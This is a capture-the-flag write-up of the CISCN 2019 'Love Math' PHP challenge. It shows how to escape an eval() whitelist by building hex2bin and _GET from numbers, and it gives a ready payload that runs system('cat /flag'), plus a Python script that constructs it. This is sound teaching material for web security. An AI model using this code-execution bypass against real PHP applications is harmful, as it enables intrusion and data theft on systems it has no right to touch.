Buuctf-[ciscn 2019 preliminary]love math
2022-06-12 23:42:00 【Python's path to becoming a God】
BUUCTF [CISCN 2019 Preliminary] Love Math (detailed walkthrough by Xiaoyute)
1. First, look at the challenge
<?php
error_reporting(0);
// I hear you really like math; do you love it more than you love the flag?
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    // Example c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die(" Too long doesn't count ");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die(" Please don't type strange characters ");
        }
    }
    // Common mathematical functions http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die(" Please don't enter strange functions ");
        }
    }
    // Help you figure out the answer
    eval('echo '.$content.';');
}
Analyzing the source code
Three filters sit in front of the eval(). First the length of the incoming parameter is limited (strlen >= 80 dies). Then a blacklist rejects whitespace (space, tab, CR, LF), single and double quotes, backticks and square brackets. Finally a whitelist is applied: every identifier-like token matched by the regex [a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]* must be one of the listed math functions. Note what the regex does not match: digits at the start of a token and the $ sign, so plain numbers and variable sigils are never checked. Whatever survives is concatenated into eval('echo '.$content.';').
Here's the idea
1. First pass in a simple expression to confirm that the input really is evaluated
payload: /?c=19-1 (the page prints 18)

2. The blacklist rules out the usual cat /flag tricks directly, but PHP has variable functions: a string holding a function name can be called through the variable. For example, the following code executes system('cat /flag'):
$a='system';
$a('cat /flag');
The first attempt along these lines is
?c=($_GET[a])($_GET[b])&a=system&b=cat /flag
This fails: _GET, a and b are all matched by the identifier regex and none of them is on the whitelist. The parameter names are easy to fix, because the whitelisted function names are just strings and can be reused as GET keys:
?c=($_GET[pi])($_GET[abs])&pi=system&abs=cat /flag
Two problems remain. _GET cannot be swapped for a whitelisted name, and [ and ] are on the blacklist (in PHP 7, {} can replace [] for offset access, which takes care of the second problem).
So the string _GET has to be built out of the whitelisted functions. These are the ones that matter:
hex2bin()
hex2bin() converts a string of hexadecimal digits into the bytes (here ASCII characters) they encode.
_GET is plain ASCII, so a hex dump or online converter gives its hex form: 5f 47 45 54.

hex2bin('5f474554') is therefore _GET. But hex2bin() is not on the whitelist, and the literal 5f474554 cannot be written either, because
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
extracts f474554 from it as an identifier, which then fails the whitelist check. Both pieces have to be generated at runtime from numbers.
The name hex2bin can be produced with base_convert().
base_convert() converts a numeric string between any two bases from 2 to 36. Base 36 uses the digits 0-9 followed by a-z, so any lowercase function name is a valid base-36 numeral.
Read hex2bin as a base-36 number, convert it to decimal, and base_convert() turns that decimal back into base 36, which yields the string hex2bin:
hex2bin === base_convert(37907361743,10,36)
The hex string 5f474554 is produced the same way with dechex(), which converts a decimal integer to hexadecimal:
dechex(1598506324) === '5f474554', since 0x5f474554 is 1598506324 in decimal.
The final payload (the c= value is exactly 79 bytes, one under the limit):
/?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat /flag
How it evaluates: $pi is assigned hex2bin('5f474554'), i.e. the string _GET, so $$pi is $_GET. ($$pi){pi} is $_GET['pi'] = system and ($$pi){abs} is $_GET['abs'] = cat /flag, so the eval ends up running system('cat /flag'). The only identifiers the regex sees are pi, base_convert, dechex and abs, all whitelisted; $ and the digits are never checked. The curly-brace offset syntax used here is deprecated in PHP 7.4 and removed in PHP 8.0, so this exact payload needs the PHP 7 runtime the challenge ran on.
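To make the reasoning above checkable offline, here is an added Python example (not part of the original writeup or the challenge) that re-implements the three PHP filters, derives the two numeric constants from the strings hex2bin and _GET, and assembles the payload. The constructed test inputs below are the failed attempts from the text. The filter transcription assumes ASCII input, where Python's len() agrees with PHP's strlen().

```python
import re

# Added example: Python re-implementation of the challenge's filters
# (transcribed from the PHP quoted above) plus payload construction.
MAX_LEN = 80

# PHP's blacklist entries are used as regex atoms, so '\t', '\[' etc. match
# the literal tab / bracket characters; the literal characters are stored here.
BLACKLIST = [' ', '\t', '\r', '\n', "'", '"', '`', '[', ']']

WHITELIST = {
    'abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh',
    'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex',
    'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax',
    'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value',
    'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand',
    'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin',
    'sinh', 'sqrt', 'srand', 'tan', 'tanh',
}

# Same pattern as the PHP preg_match_all. '$' is not in the leading class,
# so variable names are never checked, and a hex literal such as 5f474554
# yields the bogus "identifier" f474554.
IDENT_RE = re.compile(r'[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*')

BASE36_DIGITS = '0123456789abcdefghijklmnopqrstuvwxyz'


def name_to_base36_int(name: str) -> int:
    """Read a lowercase function name as a base-36 numeral.

    PHP's base_convert($n, 10, 36) on the result returns the name,
    which is how hex2bin gets past the whitelist.
    """
    n = 0
    for ch in name.lower():
        n = n * 36 + BASE36_DIGITS.index(ch)
    return n


def ascii_to_hex_int(s: str) -> int:
    """Interpret the ASCII bytes of s as one hexadecimal number.

    PHP's dechex() on the result returns the hex string, and hex2bin()
    of that hex string returns s again (here: "_GET").
    """
    return int(s.encode('ascii').hex(), 16)


def filter_reason(content: str):
    """Return None if content would reach eval(), else why it dies."""
    if len(content) >= MAX_LEN:
        return 'too long'
    for item in BLACKLIST:
        if item in content:
            return f'blacklisted character {item!r}'
    for func in IDENT_RE.findall(content):
        if func not in WHITELIST:
            return f'non-whitelisted identifier {func}'
    return None


def build_payload(var: str = 'pi', arg: str = 'abs') -> str:
    """Build the c= value from the writeup.

    var and arg must be whitelisted names because they double as the PHP
    variable name and as the GET parameter keys. In PHP 7:
      $pi = hex2bin("5f474554")  -> "_GET"
      ($$pi){pi}                 -> $_GET['pi']   (function name)
      ($$pi){abs}                -> $_GET['abs']  (its argument)
    """
    hex2bin_n = name_to_base36_int('hex2bin')
    get_n = ascii_to_hex_int('_GET')
    return (f'${var}=base_convert({hex2bin_n},10,36)(dechex({get_n}));'
            f'($${var}){{{var}}}(($${var}){{{arg}}})')


if __name__ == '__main__':
    c = build_payload()
    print(len(c), filter_reason(c))
    print(f'/?c={c}&pi=system&abs=cat /flag')
```

Running it prints the 79-byte payload and None for the filter check; swapping the short names for a longer whitelisted one (for example abs for base_convert) pushes the payload past 80 bytes, which is why the writeup uses pi and abs.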
